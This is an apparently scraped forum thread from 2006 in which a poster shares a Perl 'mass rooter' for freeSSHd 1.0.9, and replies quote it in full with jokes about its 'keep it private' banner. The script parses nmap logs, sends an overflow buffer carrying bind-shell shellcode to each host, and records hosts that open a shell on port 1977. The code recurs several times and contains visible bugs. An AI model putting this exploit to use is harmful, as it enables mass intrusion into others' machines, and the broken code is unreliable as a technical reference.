Computer Security - freesshd 1.0.9 massr00ter

06-17-2006, 12:02 AM

Here is an freesshd massrooter it will be check and hack
from the nmap portscan logs. Have Fun with
this tool:

#!/usr/bin/perl

use Socket;
use IO::Socket::INET;

my $port = '22';
my @banner = (22);
my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
"+ +\n".
"+ freeSSHd 1.0.9 Mass r00ter +\n".
"+ +\n".
"+ Author: cyberstorm +\n".
"+ Contact: cyberstorm187[at]arcor.de +\n".
"+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
"+ +\n".
"+++++++++++++++++++++++++++++++++++++++++++++\n";

my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
"\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";

print "$info";
&usage if !@ARGV; &main;

sub main {
while (<>) {
if (/^Interesting ports on.*$(\S+)$:/) {
$ip = $1; $i++;
} foreach $port (@banner) {
if (/^$port\/(\w+)\s+open/) {
$proto = $1; $p++;
&banner($ip, $port, $proto);
}
}
} &stats;
}

sub banner {
my ($ip, $port, $proto) = @_;
print "$ip:$port\t=> ";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
connect(SOCK, sockaddr_in($port, inet_aton($ip)));
if ($port != 80) {
$banner =<SOCK>;
close(SOCK);
print "$banner";
} else {
send(SOCK, "GET / HTTP/1.0\n\n", 0);
@o = <SOCK>;
close(SOCK);
foreach (@o) {
if (/Server:\s(.*)/) {
$banner = $1;
print "$banner";
}
}
}
if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
&exploit($ip,$port,$proto);
}
}

sub exploit {
my ($ip,$port,$proto) = @_;
if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
my $buff =
"\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";

my $buff = $buff + "A" * 1055;
my $buff = $buff + $eip;
my $buff = $buff + "yyyy";
my $buff = $buff + "\x90" * 4;
my $buff = $buff + $shellcode;
my $buff = $buff + "B" * 19021 + "\r\n";

print "[~] Try to connect to $ip\n";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
connect(SOCK, sockaddr_in($port, inet_aton($ip)));
print "[~] Creating Buffer\n";
send(SOCK, $buff, 0);
close(SOCK);
print "[~] Send Buffer\n";
print "[~] checking ...\n";

sleep(1);
if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
print "[~] YoU got an Shell\n".
"Connect over Telnet on Port 1977\n";
open(OUTPUT, '>>freesshd.txt');
print OUTPUT "$ip\n";
close(OUTPUT);
} else {
print "Sorry, Dude !\n";
}
}
}

sub usage {
print "freesshd.pl <infile>\n";
}

cyberstorm

06-17-2006, 08:01 AM

cyberstorm wrote:
> Here is an freesshd massrooter it will be check and hack
> from the nmap portscan logs. Have Fun with
> this tool:
>
> #!/usr/bin/perl
>
> use Socket;
> use IO::Socket::INET;
>
> my $port = '22';
> my @banner = (22);
> my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
> "+ +\n".
> "+ freeSSHd 1.0.9 Mass r00ter +\n".
> "+ +\n".
> "+ Author: cyberstorm +\n".
> "+ Contact: cyberstorm187[at]arcor.de +\n".
> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
> "+ +\n".
> "+++++++++++++++++++++++++++++++++++++++++++++\n";
>
> my $shellcode =
> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";
>
> print "$info";
> &usage if !@ARGV; &main;
>
>
> sub main {
> while (<>) {
> if (/^Interesting ports on.*$(\S+)$:/) {
> $ip = $1; $i++;
> } foreach $port (@banner) {
> if (/^$port\/(\w+)\s+open/) {
> $proto = $1; $p++;
> &banner($ip, $port, $proto);
> }
> }
> } &stats;
> }
>
> sub banner {
> my ($ip, $port, $proto) = @_;
> print "$ip:$port\t=> ";
> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
> if ($port != 80) {
> $banner =<SOCK>;
> close(SOCK);
> print "$banner";
> } else {
> send(SOCK, "GET / HTTP/1.0\n\n", 0);
> @o = <SOCK>;
> close(SOCK);
> foreach (@o) {
> if (/Server:\s(.*)/) {
> $banner = $1;
> print "$banner";
> }
> }
> }
> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
> &exploit($ip,$port,$proto);
> }
> }
>
> sub exploit {
> my ($ip,$port,$proto) = @_;
> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
> my $buff =
> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";
>
> my $buff = $buff + "A" * 1055;
> my $buff = $buff + $eip;
> my $buff = $buff + "yyyy";
> my $buff = $buff + "\x90" * 4;
> my $buff = $buff + $shellcode;
> my $buff = $buff + "B" * 19021 + "\r\n";
>
> print "[~] Try to connect to $ip\n";
> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
> print "[~] Creating Buffer\n";
> send(SOCK, $buff, 0);
> close(SOCK);
> print "[~] Send Buffer\n";
> print "[~] checking ...\n";
>
> sleep(1);
> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
> print "[~] YoU got an Shell\n".
> "Connect over Telnet on Port 1977\n";
> open(OUTPUT, '>>freesshd.txt');
> print OUTPUT "$ip\n";
> close(OUTPUT);
> } else {
> print "Sorry, Dude !\n";
> }
> }
> }
>
> sub usage {
> print "freesshd.pl <infile>\n";
> }
>
Keep it PRIVATE PRIVATE!!!
By posting it to a news group LOL

Geordie Guy

06-18-2006, 09:13 AM

Geordie Guy wrote:

> cyberstorm wrote:
>> Here is an freesshd massrooter it will be check and hack
>> from the nmap portscan logs. Have Fun with
>> this tool:
>>
>> #!/usr/bin/perl
>>
>> use Socket;
>> use IO::Socket::INET;
>>
>> my $port = '22';
>> my @banner = (22);
>> my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
>> "+ +\n".
>> "+ freeSSHd 1.0.9 Mass r00ter +\n".
>> "+ +\n".
>> "+ Author: cyberstorm +\n".
>> "+ Contact: cyberstorm187[at]arcor.de +\n".
>> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
>> "+ +\n".
>> "+++++++++++++++++++++++++++++++++++++++++++++\n";
>>
>> my $shellcode =
>> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
>> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
>> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
>> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
>> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
>> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
>> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
>> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
>> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
>> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
>> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
>> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
>> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
>> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
>> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
>> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
>> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
>> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
>> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
>> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";
>>
>> print "$info";
>> &usage if !@ARGV; &main;
>>
>>
>> sub main {
>> while (<>) {
>> if (/^Interesting ports on.*$(\S+)$:/) {
>> $ip = $1; $i++;
>> } foreach $port (@banner) {
>> if (/^$port\/(\w+)\s+open/) {
>> $proto = $1; $p++;
>> &banner($ip, $port, $proto);
>> }
>> }
>> } &stats;
>> }
>>
>> sub banner {
>> my ($ip, $port, $proto) = @_;
>> print "$ip:$port\t=> ";
>> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
>> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
>> if ($port != 80) {
>> $banner =<SOCK>;
>> close(SOCK);
>> print "$banner";
>> } else {
>> send(SOCK, "GET / HTTP/1.0\n\n", 0);
>> @o = <SOCK>;
>> close(SOCK);
>> foreach (@o) {
>> if (/Server:\s(.*)/) {
>> $banner = $1;
>> print "$banner";
>> }
>> }
>> }
>> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
>> &exploit($ip,$port,$proto);
>> }
>> }
>>
>> sub exploit {
>> my ($ip,$port,$proto) = @_;
>> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
>> my $buff =
>> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
>> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";
>>
>> my $buff = $buff + "A" * 1055;
>> my $buff = $buff + $eip;
>> my $buff = $buff + "yyyy";
>> my $buff = $buff + "\x90" * 4;
>> my $buff = $buff + $shellcode;
>> my $buff = $buff + "B" * 19021 + "\r\n";
>>
>> print "[~] Try to connect to $ip\n";
>> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
>> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
>> print "[~] Creating Buffer\n";
>> send(SOCK, $buff, 0);
>> close(SOCK);
>> print "[~] Send Buffer\n";
>> print "[~] checking ...\n";
>>
>> sleep(1);
>> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
>> print "[~] YoU got an Shell\n".
>> "Connect over Telnet on Port 1977\n";
>> open(OUTPUT, '>>freesshd.txt');
>> print OUTPUT "$ip\n";
>> close(OUTPUT);
>> } else {
>> print "Sorry, Dude !\n";
>> }
>> }
>> }
>>
>> sub usage {
>> print "freesshd.pl <infile>\n";
>> }
>>
> Keep it PRIVATE PRIVATE!!!
> By posting it to a news group LOL

No, share, share, share!!!

Im
--
*************************************
Pass a Net Neutrality Law in the US!!!!

Save the Internet:
http://www.savetheinternet.com/

Its our net:
http://www.itsournet.org/

*************************************

imhotep

06-17-2006, 08:01 AM	#2
Geordie Guy Posts: n/a	Re: freesshd 1.0.9 massr00ter cyberstorm wrote: > Here is an freesshd massrooter it will be check and hack > from the nmap portscan logs. Have Fun with > this tool: > > #!/usr/bin/perl > > use Socket; > use IO::Socket::INET; > > my $port = '22'; > my @banner = (22); > my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n". > "+ +\n". > "+ freeSSHd 1.0.9 Mass r00ter +\n". > "+ +\n". > "+ Author: cyberstorm +\n". > "+ Contact: cyberstorm187[at]arcor.de +\n". > "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n". > "+ +\n". > "+++++++++++++++++++++++++++++++++++++++++++++\n"; > > my $shellcode = > "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45". > "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49". > "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d". > "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66". > "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61". > "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40". > "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32". > "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6". > "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09". > "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0". > "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff". > "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53". > "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff". > "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64". > "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89". > "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab". > "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51". > "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53". > "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6". > "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0"; > > print "$info"; > &usage if !@ARGV; &main; > > > sub main { > while (<>) { > if (/^Interesting ports on.\((\S+)\):/) { > $ip = $1; $i++; > } foreach $port (@banner) { > if (/^$port\/(\w+)\s+open/) { > $proto = $1; $p++; > &banner($ip, $port, $proto); > } > } > } &stats; > } > > sub banner { > my ($ip, $port, $proto) = @_; > print "$ip:$port\t=> "; > socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto)); > connect(SOCK, sockaddr_in($port, inet_aton($ip))); > if ($port != 80) { > $banner =<SOCK>; > close(SOCK); > print "$banner"; > } else { > send(SOCK, "GET / HTTP/1.0\n\n", 0); > @o = <SOCK>; > close(SOCK); > foreach (@o) { > if (/Server:\s(.)/) { > $banner = $1; > print "$banner"; > } > } > } > if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){ > &exploit($ip,$port,$proto); > } > } > > sub exploit { > my ($ip,$port,$proto) = @_; > if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){ > my $buff = > "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48". > "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00". > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde"; > > my $buff = $buff + "A" * 1055; > my $buff = $buff + $eip; > my $buff = $buff + "yyyy"; > my $buff = $buff + "\x90" * 4; > my $buff = $buff + $shellcode; > my $buff = $buff + "B" * 19021 + "\r\n"; > > print "[~] Try to connect to $ip\n"; > socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto)); > connect(SOCK, sockaddr_in($port, inet_aton($ip))); > print "[~] Creating Buffer\n"; > send(SOCK, $buff, 0); > close(SOCK); > print "[~] Send Buffer\n"; > print "[~] checking ...\n"; > > sleep(1); > if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){ > print "[~] YoU got an Shell\n". > "Connect over Telnet on Port 1977\n"; > open(OUTPUT, '>>freesshd.txt'); > print OUTPUT "$ip\n"; > close(OUTPUT); > } else { > print "Sorry, Dude !\n"; > } > } > } > > sub usage { > print "freesshd.pl <infile>\n"; > } > Keep it PRIVATE PRIVATE!!! By posting it to a news group LOL Geordie Guy

06-18-2006, 09:13 AM	#3
imhotep Posts: n/a	Re: freesshd 1.0.9 massr00ter Geordie Guy wrote: > cyberstorm wrote: >> Here is an freesshd massrooter it will be check and hack >> from the nmap portscan logs. Have Fun with >> this tool: >> >> #!/usr/bin/perl >> >> use Socket; >> use IO::Socket::INET; >> >> my $port = '22'; >> my @banner = (22); >> my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n". >> "+ +\n". >> "+ freeSSHd 1.0.9 Mass r00ter +\n". >> "+ +\n". >> "+ Author: cyberstorm +\n". >> "+ Contact: cyberstorm187[at]arcor.de +\n". >> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n". >> "+ +\n". >> "+++++++++++++++++++++++++++++++++++++++++++++\n"; >> >> my $shellcode = >> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45". >> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49". >> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d". >> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66". >> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61". >> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40". >> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32". >> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6". >> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09". >> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0". >> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff". >> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53". >> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff". >> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64". >> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89". >> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab". >> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51". >> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53". >> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6". >> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0"; >> >> print "$info"; >> &usage if !@ARGV; &main; >> >> >> sub main { >> while (<>) { >> if (/^Interesting ports on.\((\S+)\):/) { >> $ip = $1; $i++; >> } foreach $port (@banner) { >> if (/^$port\/(\w+)\s+open/) { >> $proto = $1; $p++; >> &banner($ip, $port, $proto); >> } >> } >> } &stats; >> } >> >> sub banner { >> my ($ip, $port, $proto) = @_; >> print "$ip:$port\t=> "; >> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto)); >> connect(SOCK, sockaddr_in($port, inet_aton($ip))); >> if ($port != 80) { >> $banner =<SOCK>; >> close(SOCK); >> print "$banner"; >> } else { >> send(SOCK, "GET / HTTP/1.0\n\n", 0); >> @o = <SOCK>; >> close(SOCK); >> foreach (@o) { >> if (/Server:\s(.)/) { >> $banner = $1; >> print "$banner"; >> } >> } >> } >> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){ >> &exploit($ip,$port,$proto); >> } >> } >> >> sub exploit { >> my ($ip,$port,$proto) = @_; >> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){ >> my $buff = >> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48". >> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00". >> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde"; >> >> my $buff = $buff + "A" * 1055; >> my $buff = $buff + $eip; >> my $buff = $buff + "yyyy"; >> my $buff = $buff + "\x90" * 4; >> my $buff = $buff + $shellcode; >> my $buff = $buff + "B" * 19021 + "\r\n"; >> >> print "[~] Try to connect to $ip\n"; >> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto)); >> connect(SOCK, sockaddr_in($port, inet_aton($ip))); >> print "[~] Creating Buffer\n"; >> send(SOCK, $buff, 0); >> close(SOCK); >> print "[~] Send Buffer\n"; >> print "[~] checking ...\n"; >> >> sleep(1); >> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){ >> print "[~] YoU got an Shell\n". >> "Connect over Telnet on Port 1977\n"; >> open(OUTPUT, '>>freesshd.txt'); >> print OUTPUT "$ip\n"; >> close(OUTPUT); >> } else { >> print "Sorry, Dude !\n"; >> } >> } >> } >> >> sub usage { >> print "freesshd.pl <infile>\n"; >> } >> > Keep it PRIVATE PRIVATE!!! > By posting it to a news group LOL No, share, share, share!!! Im -- *********************************** Pass a Net Neutrality Law in the US!!!! Save the Internet: http://www.savetheinternet.com/ Its our net: http://www.itsournet.org/ *********************************** imhotep

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search

06-17-2006, 12:02 AM	#1
	freesshd 1.0.9 massr00ter Here is an freesshd massrooter it will be check and hack from the nmap portscan logs. Have Fun with this tool: #!/usr/bin/perl use Socket; use IO::Socket::INET; my $port = '22'; my @banner = (22); my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n". "+ +\n". "+ freeSSHd 1.0.9 Mass r00ter +\n". "+ +\n". "+ Author: cyberstorm +\n". "+ Contact: cyberstorm187[at]arcor.de +\n". "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n". "+ +\n". "+++++++++++++++++++++++++++++++++++++++++++++\n"; my $shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45". "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49". "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d". "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66". "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61". "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40". "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32". "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6". "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09". "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0". "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff". "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53". "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff". "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ 